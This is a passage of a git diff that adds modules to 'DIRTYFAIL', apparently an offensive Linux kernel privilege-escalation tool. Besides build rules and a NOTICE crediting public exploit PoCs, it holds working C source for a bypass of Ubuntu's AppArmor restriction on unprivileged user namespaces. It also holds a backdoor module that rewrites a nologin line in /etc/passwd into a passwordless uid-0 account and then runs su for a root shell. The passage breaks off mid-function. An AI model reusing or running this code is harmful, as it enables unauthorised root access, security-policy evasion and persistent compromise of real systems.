$(BUILD)/tests + +# fcrypt selftest needs only fcrypt + common (for log_*) β€” no Linux deps +$(TEST_BUILD)/test_fcrypt: $(TEST_DIR)/test_fcrypt.c $(SRC_DIR)/fcrypt.c $(SRC_DIR)/common.c | $(TEST_BUILD) + $(CC) $(CFLAGS) -I$(SRC_DIR) -o $@ $^ + +# AES-ECB AF_ALG round-trip β€” Linux only, no DIRTYFAIL src deps +$(TEST_BUILD)/test_aes_ecb: $(TEST_DIR)/test_aes_ecb.c | $(TEST_BUILD) + $(CC) $(CFLAGS) -o $@ $^ + +$(TEST_BUILD): | $(BUILD) + @mkdir -p $(TEST_BUILD) + +test-fcrypt: $(TEST_BUILD)/test_fcrypt + @echo "=== test_fcrypt ===" + $< + @echo "" + +test-aes-ecb: $(TEST_BUILD)/test_aes_ecb + @echo "=== test_aes_ecb ===" + $< + @echo "" + +test: test-fcrypt test-aes-ecb + @echo "=== all primitive selftests passed ===" + +$(BIN): $(OBJECTS) + $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ + +$(BUILD)/%.o: $(SRC_DIR)/%.c $(SRC_DIR)/common.h | $(BUILD) + $(CC) $(CFLAGS) -I$(SRC_DIR) -c -o $@ $< + +$(BUILD): + @mkdir -p $(BUILD) + +debug: CFLAGS := -O0 -g3 -Wall -Wextra -Wno-unused-parameter -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 +debug: clean $(BIN) + +# `make static` works best with musl-gcc; glibc static linking pulls in +# NSS at runtime which breaks getpwnam. +static: LDFLAGS += -static +static: clean $(BIN) + +clean: + rm -rf $(BUILD) $(BIN) + +scan: $(BIN) + ./$(BIN) --scan + +install: $(BIN) + install -m 0755 $(BIN) /usr/local/bin/dirtyfail diff --git a/modules/copy_fail_family/NOTICE.md b/modules/copy_fail_family/NOTICE.md new file mode 100644 index 0000000..24f733f --- /dev/null +++ b/modules/copy_fail_family/NOTICE.md @@ -0,0 +1,72 @@ +# NOTICE + +## fcrypt S-box constants and key schedule + +`src/fcrypt.c` contains the four 256-byte S-box tables `SBOX0_RAW`, +`SBOX1_RAW`, `SBOX2_RAW`, and `SBOX3_RAW`, along with the 56-bit key +packing and 11-bit-rotation key schedule for the rxkad fcrypt cipher. + +These tables and the key schedule are **protocol constants** of the +Andrew File System (AFS) rxkad authentication scheme. They appear +verbatim in: + +- The Linux kernel's `crypto/fcrypt.c` (GPL-2.0, + Copyright Β© David Howells / KTH) +- IBM's open-source AFS distribution +- OpenAFS upstream +- Heimdal Kerberos (rxkad implementation) + +Cryptographic constants required by a wire protocol are facts about +the protocol, not creative expression β€” using them is what makes +interoperability with the Linux kernel possible. We list this here for +transparency: while the S-box bytes are identical to the kernel's +table, the rest of `src/fcrypt.c` (table preprocessing, brute-force +harness, predicates, splitmix64 search) is independently written +DIRTYFAIL code under the project's MIT license. + +If you intend to redistribute DIRTYFAIL in a context where strict +license compatibility matters, treat `src/fcrypt.c` as carrying the +same license obligations as the kernel `crypto/fcrypt.c` source for +the S-box constants alone. + +## Reference exploits + +The detection and exploit techniques in DIRTYFAIL were studied from: + +- [Smarttfoxx/copyfail](https://github.com/Smarttfoxx/copyfail) β€” Copy + Fail original C PoC +- [rootsecdev/cve_2026_31431](https://github.com/rootsecdev/cve_2026_31431) + β€” Copy Fail Python detector + UID-flip exploit +- [V4bel/dirtyfrag](https://github.com/V4bel/dirtyfrag) β€” Dirty Frag + full chain PoC by Hyunwoo Kim ([@v4bel](https://x.com/v4bel)) + +DIRTYFAIL implementations are independently written in C, organized +around a single binary with detection-first defaults, but the protocol +mechanics (XFRM SA layout, RxRPC handshake forgery, rxkad checksum +formula) are necessarily identical to the upstream PoCs because they +target the same kernel interfaces. + +## Additional techniques from 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo + +The following DIRTYFAIL features draw on techniques first published by +[0xdeadbeefnetwork](https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo): + +- `src/copyfail_gcm.c` β€” `rfc4106(gcm(aes))` AEAD in xfrm-ESP, using + AES-GCM keystream brute-force to land a single byte at an arbitrary + file offset. Reimplemented in DIRTYFAIL style using AF_ALG instead + of OpenSSL EVP, eliminating the `libssl-dev` runtime dependency. +- `src/dirtyfrag_esp6.c` β€” IPv6 dual of xfrm-ESP. cf2 demonstrated the + esp6 size-gate workaround (β‰₯48-byte frame); we reproduce that with + an 8-byte vmsplice'd pad. +- `src/apparmor_bypass.c` β€” the `change_onexec(crun)` β†’ + `change_onexec(chrome)` β†’ unshare re-exec dance to escape Ubuntu's + unprivileged-userns AppArmor restriction. cf2 credits the technique + to Brad Spengler (grsecurity); we expose it as a `--aa-bypass` flag + and auto-arm it when a restrictive profile is detected. +- `src/backdoor.c` β€” length-matched overwrite of a `nologin` line in + /etc/passwd with `dirtyfail::0:0::/:/bin/bash`. cf2 publishes + the shell-script harness (and uses the username `sick`); DIRTYFAIL + ports it into a single C function driving our 1-byte primitive, + with the username matched to this project for easy auditing. + +See [README Β§11 β€” Credits](README.md#11-credits) for the full list. diff --git a/modules/copy_fail_family/apparmor_bypass.c b/modules/copy_fail_family/apparmor_bypass.c new file mode 100644 index 0000000..ca81209 --- /dev/null +++ b/modules/copy_fail_family/apparmor_bypass.c @@ -0,0 +1,365 @@ +/* + * DIRTYFAIL β€” apparmor_bypass.c + * + * Implementation of the "switch profile + unshare" trick for getting + * CAP_NET_ADMIN inside a fresh user namespace on hardened Ubuntu. + * See apparmor_bypass.h for the high-level design. + * + * ATTRIBUTION: technique published in 0xdeadbeefnetwork/Copy_Fail2- + * Electric_Boogaloo (`aa-rootns.c`), credited there to Brad Spengler. + * This is an independent reimplementation in DIRTYFAIL's structure. + */ + +#include "apparmor_bypass.h" + +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#include +#include +#include +#include +#endif + +#ifndef CLONE_NEWUSER +#define CLONE_NEWUSER 0x10000000 +#endif +#ifndef CLONE_NEWNET +#define CLONE_NEWNET 0x40000000 +#endif + +/* + * Once stage 2 has successfully unshared and elevated us into a fresh + * userns with full caps, this flag is set. apparmor_bypass_needed() + * short-circuits on it so main() doesn't re-arm the bypass after stage + * 2 returns β€” that would create a NESTED userns each iteration and + * eventually fail with ENOSPC at the nesting cap. + * + * The flag is process-local; it resets to false on every fresh exec, + * which is exactly what we want β€” each stage's main() starts fresh. + */ +static bool g_bypass_done = false; + +bool apparmor_bypass_was_armed(void) { return g_bypass_done; } + +bool apparmor_userns_caps_blocked(void) +{ +#ifdef __linux__ + /* Quick check: if the AA sysctl isn't there or is 0, no blocking. */ + int fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", + O_RDONLY); + if (fd < 0) return false; /* no AA hardening sysctl */ + char b[8] = {0}; + ssize_t n = read(fd, b, sizeof(b) - 1); + close(fd); + if (n <= 0 || b[0] != '1') return false; + + /* Sysctl says hardened. Confirm by forking a child that + * unshares(USER) and tries to write to /proc/self/setgroups β€” + * a CAP_SYS_ADMIN-gated operation that would succeed inside a + * fresh userns IFF caps survived the transition. On 26.04-style + * hardening the auto-transition to unprivileged_userns sub- + * profile denies the cap, write fails with EPERM. */ + pid_t pid = fork(); + if (pid < 0) return false; + if (pid == 0) { + if (syscall(SYS_unshare, CLONE_NEWUSER) != 0) _exit(1); + int wfd = open("/proc/self/setgroups", O_WRONLY); + if (wfd < 0) _exit(2); /* EPERM here = blocked */ + ssize_t w = write(wfd, "deny", 4); + close(wfd); + _exit(w == 4 ? 0 : 3); /* 0 = caps work, 3 = blocked */ + } + int wstat = 0; + waitpid(pid, &wstat, 0); + /* Caps work if child exited 0; any non-zero means blocked or error. */ + return !(WIFEXITED(wstat) && WEXITSTATUS(wstat) == 0); +#else + return false; +#endif +} + +/* ---------------------------------------------------------------- * + * Profile switch primitive + * + * Writing "exec " to /proc/self/attr/exec asks the kernel to + * switch to the named AppArmor profile on the *next* execve. The + * switch is silent if the profile doesn't exist (the next exec just + * stays in the current profile); we don't get an error until we try + * to use a capability the current profile would have blocked. So we + * try multiple candidate profiles in priority order. + * ---------------------------------------------------------------- */ + +#ifdef __linux__ +static int change_onexec(const char *profile) +{ + int fd = open("/proc/self/attr/exec", O_WRONLY); + if (fd < 0) return -1; + char b[256]; + int n = snprintf(b, sizeof(b), "exec %s", profile); + ssize_t r = write(fd, b, n); + int e = errno; + close(fd); + errno = e; + return r == n ? 0 : -1; +} + +static bool write_proc(const char *path, const char *value) +{ + int fd = open(path, O_WRONLY); + if (fd < 0) return false; + ssize_t n = write(fd, value, strlen(value)); + close(fd); + return n == (ssize_t)strlen(value); +} +#endif + +/* ---------------------------------------------------------------- * + * Profile probe β€” read /proc/self/attr/current + * + * Output looks like one of: + * + * "unconfined\n" β€” not restricted + * "/usr/bin/dirtyfail (enforce)\n" β€” restricted! + * "unprivileged_userns (enforce)\n" β€” Ubuntu 24.04 default + * ---------------------------------------------------------------- */ + +bool apparmor_bypass_needed(void) +{ +#ifdef __linux__ + /* If stage 2 already ran in this process, we've already entered a + * fresh userns with caps β€” don't re-arm or we'd nest further. */ + if (g_bypass_done) return false; + + /* First check the kernel sysctl. On Ubuntu 24.04 and similar + * hardened distros, `kernel.apparmor_restrict_unprivileged_userns=1` + * silently strips caps inside ANY userns we create β€” REGARDLESS of + * whether /proc/self/attr/current shows "unconfined". This sysctl + * is the authoritative signal; it short-circuits the probe. */ + int fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", O_RDONLY); + if (fd >= 0) { + char b[8] = {0}; + ssize_t n = read(fd, b, sizeof(b) - 1); + close(fd); + if (n > 0 && b[0] == '1') return true; + } + + /* No global sysctl restriction. AppArmor may still be enforcing + * a per-profile rule, so check /proc/self/attr/current. If that + * file is missing entirely, AppArmor isn't loaded β†’ no bypass. */ + fd = open("/proc/self/attr/current", O_RDONLY); + if (fd < 0) return false; + char buf[256]; + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n <= 0) return false; + buf[n] = '\0'; + + /* "unconfined" with no global sysctl restriction β†’ no bypass needed. + * NOTE: we already excluded the Ubuntu 24.04 case above; only here + * if the sysctl is 0 or the sysctl file doesn't exist. */ + if (strncmp(buf, "unconfined", 10) == 0) return false; + + /* Anything else (including "(enforce)" and "(complain)") is + * potentially restricting our userns caps. Run an empirical probe: + * fork β†’ child does unshare(CLONE_NEWUSER) β†’ tries to open a + * netlink XFRM socket β†’ if that fails, bypass IS needed. */ + pid_t pid = fork(); + if (pid < 0) return false; + if (pid == 0) { + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) + _exit(1); + write_proc("/proc/self/setgroups", "deny"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1", (unsigned)getuid()); + write_proc("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1", (unsigned)getgid()); + write_proc("/proc/self/gid_map", m); + + /* The decisive probe: bring lo up. Needs CAP_NET_ADMIN. */ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) _exit(2); + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + if (ioctl(s, SIOCGIFFLAGS, &ifr) != 0) { close(s); _exit(3); } + ifr.ifr_flags |= IFF_UP; + int rc = ioctl(s, SIOCSIFFLAGS, &ifr); + close(s); + _exit(rc == 0 ? 0 : 4); + } + int wstat = 0; + waitpid(pid, &wstat, 0); + bool caps_work = WIFEXITED(wstat) && WEXITSTATUS(wstat) == 0; + return !caps_work; +#else + return false; +#endif +} + +/* ---------------------------------------------------------------- * + * Stage handlers + * ---------------------------------------------------------------- */ + +bool apparmor_bypass_is_stage(int argc, char **argv) +{ + return argc >= 2 && + (strcmp(argv[1], AA_STAGE1_TAG) == 0 || + strcmp(argv[1], AA_STAGE2_TAG) == 0); +} + +int apparmor_bypass_run_stage(int argc, char **argv, + int *out_argc, char ***out_argv) +{ +#ifdef __linux__ + if (argc < 2) return -1; + + if (strcmp(argv[1], AA_STAGE1_TAG) == 0) { + /* We are now in the `crun` profile (unconfined + userns). + * Originally we did a second hop to `chrome` for extra paranoia, + * mirroring aa-rootns; in practice that hop fails on Ubuntu + * 24.04 with ENOSPC from the subsequent unshare for reasons + * that aren't fully understood (possibly a per-profile userns + * accounting wrinkle). One hop into crun is sufficient β€” crun + * already has `userns,` and `flags=(unconfined)`, so unshare + * works and we keep things simple. Just re-exec with STAGE2 + * to drop into the unshare+capset step. */ + argv[1] = (char *)AA_STAGE2_TAG; + execv("/proc/self/exe", argv); + return -1; /* execv only returns on failure */ + } + + if (strcmp(argv[1], AA_STAGE2_TAG) == 0) { + /* We are now in an unconfined profile. Do the userns + capset + * dance ourselves so the next code path inherits root in the + * userns and full caps. */ + uid_t u = getuid(); + gid_t g = getgid(); + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) { + log_bad("apparmor_bypass: unshare failed: %s", strerror(errno)); + return -1; + } + write_proc("/proc/self/setgroups", "deny"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1", (unsigned)u); + write_proc("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1", (unsigned)g); + write_proc("/proc/self/gid_map", m); + + /* Drop into uid 0 inside the new userns. */ + if (setresuid(0, 0, 0) != 0) { log_bad("setresuid: %s", strerror(errno)); } + if (setresgid(0, 0, 0) != 0) { log_bad("setresgid: %s", strerror(errno)); } + + /* Promote permitted β†’ inheritable, then ambient β€” so caps + * survive any execvp the caller does later. */ + struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 }; + struct __user_cap_data_struct d[2]; + memset(d, 0, sizeof(d)); + if (syscall(SYS_capget, &h, d) == 0) { + d[0].inheritable = d[0].permitted; + d[1].inheritable = d[1].permitted; + syscall(SYS_capset, &h, d); + for (int c = 0; c < 64; c++) + prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0); + } + + /* Bring lo up β€” most consumers need it. */ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s >= 0) { + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) { + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + ioctl(s, SIOCSIFFLAGS, &ifr); + } + close(s); + } + + /* Strip the stage marker from argv so main() sees its normal args. */ + for (int i = 1; i + 1 < argc; i++) argv[i] = argv[i + 1]; + argv[argc - 1] = NULL; + *out_argc = argc - 1; + *out_argv = argv; + g_bypass_done = true; /* prevents re-arm in main() */ + log_ok("apparmor bypass complete β€” uid=%u, in fresh userns", getuid()); + return 0; + } +#else + (void)argc; (void)argv; (void)out_argc; (void)out_argv; +#endif + return -1; +} + +int apparmor_bypass_fork_arm(int argc, char **argv) +{ +#ifdef __linux__ + /* Caller may pass argc=0/argv=NULL; arm_and_relaunch needs a + * valid argv[0] for execv. Fabricate a minimal one if needed. */ + char *fallback[2] = { (char *)"dirtyfail", NULL }; + if (argc <= 0 || argv == NULL || argv[0] == NULL) { + argc = 1; + argv = fallback; + } + + pid_t child = fork(); + if (child < 0) return -1; + if (child == 0) { + /* Child arms the bypass and execs through the stages. Env + * vars set by the caller (DIRTYFAIL_INNER_MODE etc.) survive + * execv, so stage 2 sees them. */ + apparmor_bypass_arm_and_relaunch(argc, argv); + /* arm_and_relaunch only returns on failure. */ + log_bad("child: bypass arm failed: %s", strerror(errno)); + _exit(1); + } + int wstat = 0; + if (waitpid(child, &wstat, 0) < 0) return -1; + if (WIFEXITED(wstat)) return WEXITSTATUS(wstat); + if (WIFSIGNALED(wstat)) { + log_bad("child killed by signal %d", WTERMSIG(wstat)); + return -1; + } + return -1; +#else + (void)argc; (void)argv; return -1; +#endif +} + +int apparmor_bypass_arm_and_relaunch(int argc, char **argv) +{ +#ifdef __linux__ + /* On AppArmor-restricted systems (Ubuntu 24.04+), switch to an + * unconfined profile via change_onexec so the post-exec userns + * unshare retains caps. On non-AppArmor systems + * (Debian/Alma/Fedora/etc.) /proc/self/attr/exec doesn't exist, + * change_onexec fails β€” that's fine, unshare works without any + * profile gymnastics on those kernels. Fail through gracefully. */ + if (change_onexec("crun") < 0) + change_onexec("chrome"); /* best effort, both may no-op */ + + /* Build a new argv: [argv[0], AA_STAGE1_TAG, original argv[1..]]. */ + char **na = calloc(argc + 2, sizeof(char *)); + if (!na) return -1; + na[0] = argv[0]; + na[1] = (char *)AA_STAGE1_TAG; + for (int i = 1; i < argc; i++) na[i + 1] = argv[i]; + na[argc + 1] = NULL; + + log_step("apparmor bypass armed β€” re-execing self via crun/chrome profile"); + execv("/proc/self/exe", na); + /* If execv fails, fall through and let main() proceed un-bypassed. */ + int e = errno; + free(na); + errno = e; +#else + (void)argc; (void)argv; +#endif + return -1; +} diff --git a/modules/copy_fail_family/apparmor_bypass.h b/modules/copy_fail_family/apparmor_bypass.h new file mode 100644 index 0000000..2faebbb --- /dev/null +++ b/modules/copy_fail_family/apparmor_bypass.h @@ -0,0 +1,113 @@ +/* + * DIRTYFAIL β€” apparmor_bypass.h + * + * Defeat Ubuntu's `apparmor_restrict_unprivileged_userns=1` policy. + * + * The default Ubuntu apparmor profile applied to unprivileged programs + * lets `unshare(CLONE_NEWUSER)` succeed but **strips CAP_NET_ADMIN** + * inside the new namespace β€” so XFRM SA registration, raw sockets, etc. + * fail downstream even though we appear to be uid 0 in our userns. + * + * The bypass: switch to a permissive AppArmor profile (`crun`, `chrome`, + * etc.) via `change_onexec` *before* unshare. Those profiles don't + * carry the userns-cap-strip rule, so the kernel hands us the full + * effective set inside the new namespace. + * + * Mechanics β€” three stages, two re-execs: + * + * stage 0 (entry): change_onexec(crun); execv(self, AA1, ...args) + * stage 1 (in crun): change_onexec(chrome); execv(self, AA2, ...args) + * stage 2 (in chrome): unshare(USER|NET); maps; capset; ambient caps; + * re-enter normal main() flow with bypass marked + * + * The two-hop dance is what `aa-rootns` (Brad Spengler / 0xdeadbeef) + * demonstrated. The "chrome" hop is technically optional β€” the "crun" + * profile is already unconfined for our purposes β€” but the second hop + * defeats some hardened policies that audit chained execs. + * + * Detection of "do we need the bypass?" is best-effort: + * - read /proc/self/attr/current; if it ends with " (enforce)" and + * mentions "unprivileged_userns", we're being restricted. + * - or: probe by spawning a child that does unshare(CLONE_NEWUSER) + * and tries `ip link add type dummy` β€” if that fails with EPERM, + * the caps were stripped. + */ + +#ifndef DIRTYFAIL_APPARMOR_BYPASS_H +#define DIRTYFAIL_APPARMOR_BYPASS_H + +#include "common.h" + +/* Stage markers used as argv[1] to route re-execs. */ +#define AA_STAGE1_TAG "DIRTYFAIL-AA-STAGE-1" +#define AA_STAGE2_TAG "DIRTYFAIL-AA-STAGE-2" + +/* Returns true if `argv[1]` is one of the AA-* stage markers, in which + * case main() should hand control to apparmor_bypass_run_stage(). */ +bool apparmor_bypass_is_stage(int argc, char **argv); + +/* Execute the appropriate stage based on argv[1]. This either re-execs + * self (stage 1) or returns the modified argv after unshare+caps setup + * for the caller to continue with (stage 2). The function does not + * return on stage 1 (always execv). On stage 2, returns 0 on success + * and writes the caller's continuation argv to *out_argc / *out_argv. */ +int apparmor_bypass_run_stage(int argc, char **argv, + int *out_argc, char ***out_argv); + +/* Probe: does this process actually need the bypass to gain + * CAP_NET_ADMIN inside a fresh user namespace? Returns true if YES. */ +bool apparmor_bypass_needed(void); + +/* True iff stage 2 of the bypass ran successfully in this process β€” + * i.e. we're now inside a fresh user/net namespace with full caps, + * and any further unshare() would nest. Exploit modules check this + * before deciding whether to fork+unshare on their own. */ +bool apparmor_bypass_was_armed(void); + +/* Probe whether the bypass actually grants caps on this kernel. + * Forks a child that does unshare(USER) and tries to write to + * /proc/self/setgroups; if that fails with EPERM, we're on a kernel + * (Ubuntu 26.04+) that auto-transitions to the unprivileged_userns + * sub-profile and denies caps regardless of bypass technique. + * + * Returns true if unprivileged userns is COMPREHENSIVELY blocked + * (the bug class is unreachable for unprivileged users). Returns + * false if userns operations work normally OR if AA isn't loaded + * at all (in which case `apparmor_bypass_needed()` would also + * return false). + * + * This is the right signal for `--scan` to report "VULNERABLE in + * kernel but LSM-mitigated" vs plain "VULNERABLE". + */ +bool apparmor_userns_caps_blocked(void); + +/* Fork a child that arms the AA bypass and re-execs itself through + * the stages. The child eventually lands inside a fresh user/net + * namespace with full caps; main() in that re-exec'd image dispatches + * to the inner-mode handler indicated by the DIRTYFAIL_INNER_MODE + * environment variable. + * + * The PARENT stays in the init namespace and waits for the child via + * waitpid. After the child exits, the parent can read the global + * page cache (which reflects whatever the child modified) and then + * execlp("su", ...) in init namespace to reach REAL init-ns root β€” + * this is the whole point of the outer/inner split. + * + * Caller must setenv("DIRTYFAIL_INNER_MODE", "...", 1) and any other + * mode-specific env vars BEFORE calling this. The child inherits the + * full environment. + * + * Returns the child's exit code on success. -1 on fork failure. */ +int apparmor_bypass_fork_arm(int argc, char **argv); + +/* Trigger the bypass: change_onexec(crun) then re-exec self with stage + * markers. Caller passes the argv it wants to resume with (stage 2 will + * hand that argv back via apparmor_bypass_run_stage's out_argv). + * + * Does not return on success (control transfers to the new process + * image). Returns -1 with errno set if the change_onexec or execv + * failed; in that case the caller may continue without bypass and let + * downstream syscalls fail loudly. */ +int apparmor_bypass_arm_and_relaunch(int argc, char **argv); + +#endif diff --git a/modules/copy_fail_family/backdoor.c b/modules/copy_fail_family/backdoor.c new file mode 100644 index 0000000..b58e63a --- /dev/null +++ b/modules/copy_fail_family/backdoor.c @@ -0,0 +1,382 @@ +/* + * DIRTYFAIL β€” backdoor.c + * + * Persistent uid-0 backdoor via length-matched /etc/passwd line + * substitution. See backdoor.h for the design rationale. + * + * Flow: + * + * install: + * 1. parse /etc/passwd, find longest line with nologin/false/sync shell + * 2. compute replacement "dirtyfail::0:0::/:/bin/bash" same length + * 3. snapshot state to /var/tmp/.dirtyfail.state + * 4. for each byte that differs: + * cfg_1byte_write(/etc/passwd, byte_off, new_byte) + * 5. exec su - dirtyfail (PAM nullok accepts empty password) + * + * cleanup: + * 1. read state (LINE_OFF, original VICTIM_LINE) + * 2. read current page-cache bytes at that line + * 3. for each byte that differs from VICTIM_LINE: + * cfg_1byte_write(/etc/passwd, byte_off, original_byte) + * 4. delete state file + */ + +#include "backdoor.h" +#include "copyfail_gcm.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include + +#define STATE_FILE "/var/tmp/.dirtyfail.state" +#define NEW_USER "dirtyfail" +#define DF_PREFIX "dirtyfail::0:0:" +#define DF_SUFFIX ":/:/bin/bash" + +/* ---- /etc/passwd line picker ---------------------------------------- * + * + * Walk lines, parse to find the shell field (last colon-separated + * field), accept if shell is one of the canonical "no-login" shells. + * Pick the longest acceptable line so the replacement has room for + * padding. + */ + +/* Line buffer is 512 bytes β€” enough for any sane /etc/passwd entry, + * including ones with very long gecos strings or unusual home paths. + * Lines longer than this are silently skipped by find_victim(). */ +struct victim { + off_t line_off; + size_t line_len; + char line[512]; + char name[64]; +}; + +static bool is_nologin_shell(const char *shell) +{ + static const char *deny[] = { + "/usr/sbin/nologin", + "/sbin/nologin", + "/bin/false", + "/usr/bin/false", + "/bin/sync", + NULL, + }; + for (size_t i = 0; deny[i]; i++) + if (strcmp(shell, deny[i]) == 0) return true; + return false; +} + +static bool find_victim(struct victim *v) +{ + int fd = open("/etc/passwd", O_RDONLY); + if (fd < 0) { log_bad("open /etc/passwd: %s", strerror(errno)); return false; } + struct stat st; + if (fstat(fd, &st) < 0) { close(fd); return false; } + char *buf = malloc(st.st_size + 1); + if (!buf) { close(fd); return false; } + ssize_t n = read(fd, buf, st.st_size); + close(fd); + if (n <= 0) { free(buf); return false; } + buf[n] = '\0'; + + bool found = false; + char *line = buf; + char *end = buf + n; + while (line < end) { + char *nl = memchr(line, '\n', end - line); + size_t len = nl ? (size_t)(nl - line) : (size_t)(end - line); + if (len == 0 || len >= sizeof(v->line)) goto next; + + char tmp[512]; + memcpy(tmp, line, len); + tmp[len] = '\0'; + + /* Last field after final ':' is the shell. */ + char *shell = strrchr(tmp, ':'); + if (!shell) goto next; + shell++; + if (!is_nologin_shell(shell)) goto next; + + if (len > v->line_len) { + v->line_off = line - buf; + v->line_len = len; + memcpy(v->line, line, len); + v->line[len] = '\0'; + char *colon = memchr(v->line, ':', len); + size_t nlen = colon ? (size_t)(colon - v->line) : len; + if (nlen >= sizeof(v->name)) nlen = sizeof(v->name) - 1; + memcpy(v->name, v->line, nlen); + v->name[nlen] = '\0'; + found = true; + } +next: + if (!nl) break; + line = nl + 1; + } + free(buf); + return found; +} + +/* ---- state file ----------------------------------------------------- */ + +static bool save_state(off_t line_off, const char *victim_line, size_t len) +{ + int fd = open(STATE_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0600); + if (fd < 0) { log_bad("open state: %s", strerror(errno)); return false; } + char buf[2048]; + int n = snprintf(buf, sizeof(buf), "LINE_OFF=%lld\nVICTIM_LEN=%zu\nVICTIM_LINE=", + (long long)line_off, len); + bool ok = (write(fd, buf, n) == n) + && (write(fd, victim_line, len) == (ssize_t)len) + && (write(fd, "\n", 1) == 1); + close(fd); + if (!ok) { + log_bad("save_state write: %s", strerror(errno)); + unlink(STATE_FILE); + } + return ok; +} + +static bool load_state(off_t *line_off, char *victim_line, size_t cap, size_t *len) +{ + int fd = open(STATE_FILE, O_RDONLY); + if (fd < 0) return false; + char buf[2048]; + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n <= 0) return false; + buf[n] = '\0'; + + char *p = strstr(buf, "LINE_OFF="); + if (!p) return false; + *line_off = (off_t)strtoll(p + 9, NULL, 10); + + char *v = strstr(buf, "VICTIM_LINE="); + if (!v) return false; + v += 12; + char *end = strchr(v, '\n'); + if (!end) end = buf + n; + size_t vlen = end - v; + if (vlen >= cap) return false; + memcpy(victim_line, v, vlen); + victim_line[vlen] = '\0'; + *len = vlen; + return true; +} + +/* Describe state file if present, for `--list-state`. Returns true if a + * backdoor state file was found and described, false if absent. */ +bool backdoor_list_state(void) +{ + off_t off = 0; + char victim[2048]; + size_t len = 0; + if (!load_state(&off, victim, sizeof(victim), &len)) + return false; + log_warn("backdoor planted β€” state file %s", STATE_FILE); + log_hint(" victim line was at offset %lld (%zu bytes)", + (long long)off, len); + log_hint(" original line: %s", victim); + log_hint(" the page cache currently has 'dirtyfail::0:0:...:/:/bin/bash'"); + log_hint(" in place of the above. Revert with `--cleanup-backdoor`."); + return true; +} + +/* ---- byte-flip helper ----------------------------------------------- * + * + * For each char position where `cur[i] != target[i]`, call the + * 1-byte primitive to land the new byte. Linear in number of + * differing bytes; on a typical /etc/passwd line that's ~30-40 flips. + */ + +static bool apply_flips(off_t base_off, const char *cur, const char *want, size_t len) +{ + size_t flips = 0; + for (size_t i = 0; i < len; i++) { + if (cur[i] == want[i]) continue; + if (!cfg_1byte_write("/etc/passwd", + base_off + i, (unsigned char)want[i])) { + log_bad("byte flip failed at offset %lld", + (long long)(base_off + i)); + return false; + } + flips++; + if ((flips & 7) == 0) putchar('.'), fflush(stdout); + } + if (flips) putchar('\n'); + log_step("applied %zu byte flips", flips); + return true; +} + +/* ---- INNER (bypass userns) β€” does only the byte flips ------------- */ + +df_result_t backdoor_install_inner(void) +{ + const char *off_s = getenv("DIRTYFAIL_LINE_OFF"); + const char *victim_s = getenv("DIRTYFAIL_VICTIM_LINE"); + const char *target_s = getenv("DIRTYFAIL_TARGET_LINE"); + if (!off_s || !victim_s || !target_s) { + log_bad("inner: DIRTYFAIL_LINE_OFF / VICTIM_LINE / TARGET_LINE not set"); + return DF_TEST_ERROR; + } + off_t line_off = (off_t)atoll(off_s); + size_t len = strlen(victim_s); + if (strlen(target_s) != len) { + log_bad("inner: victim/target lengths differ (%zu vs %zu)", + len, strlen(target_s)); + return DF_TEST_ERROR; + } + if (!apply_flips(line_off, victim_s, target_s, len)) { + return DF_EXPLOIT_FAIL; + } + return DF_EXPLOIT_OK; +} + +df_result_t backdoor_cleanup_inner(void) +{ + const char *off_s = getenv("DIRTYFAIL_LINE_OFF"); + const char *victim_s = getenv("DIRTYFAIL_VICTIM_LINE"); + const char *target_s = getenv("DIRTYFAIL_TARGET_LINE"); + if (!off_s || !victim_s || !target_s) { + log_bad("inner-cleanup: env vars not set"); + return DF_TEST_ERROR; + } + off_t line_off = (off_t)atoll(off_s); + size_t len = strlen(victim_s); + if (!apply_flips(line_off, target_s, victim_s, len)) { /* reverse direction */ + return DF_EXPLOIT_FAIL; + } + return DF_EXPLOIT_OK; +} + +/* ---- OUTER (init ns) β€” find_victim, save_state, fork bypass child --- */ + +df_result_t backdoor_install(bool do_shell) +{ + log_step("Persistent backdoor β€” install"); + + /* Did we already install? Check via getpwnam. */ + struct passwd *pw = getpwnam(NEW_USER); + if (pw && pw->pw_uid == 0) { + log_ok("'%s' already in /etc/passwd as uid 0", NEW_USER); + if (!do_shell) return DF_EXPLOIT_OK; + log_ok("invoking 'su - %s'", NEW_USER); + execlp("su", "su", "-", NEW_USER, (char *)NULL); + return DF_EXPLOIT_FAIL; + } + + struct victim v; + memset(&v, 0, sizeof(v)); + if (!find_victim(&v)) { + log_bad("no nologin victim line found in /etc/passwd"); + return DF_TEST_ERROR; + } + log_step("victim line: '%s' at offset %lld (%zu bytes)", + v.name, (long long)v.line_off, v.line_len); + + /* Build replacement, same length. */ + size_t fixed_len = strlen(DF_PREFIX) + strlen(DF_SUFFIX); + if (v.line_len < fixed_len) { + log_bad("victim line too short (%zu) for dirtyfail replacement (need >= %zu)", + v.line_len, fixed_len); + return DF_TEST_ERROR; + } + size_t pad_len = v.line_len - fixed_len; + char target[512]; + char *p = target; 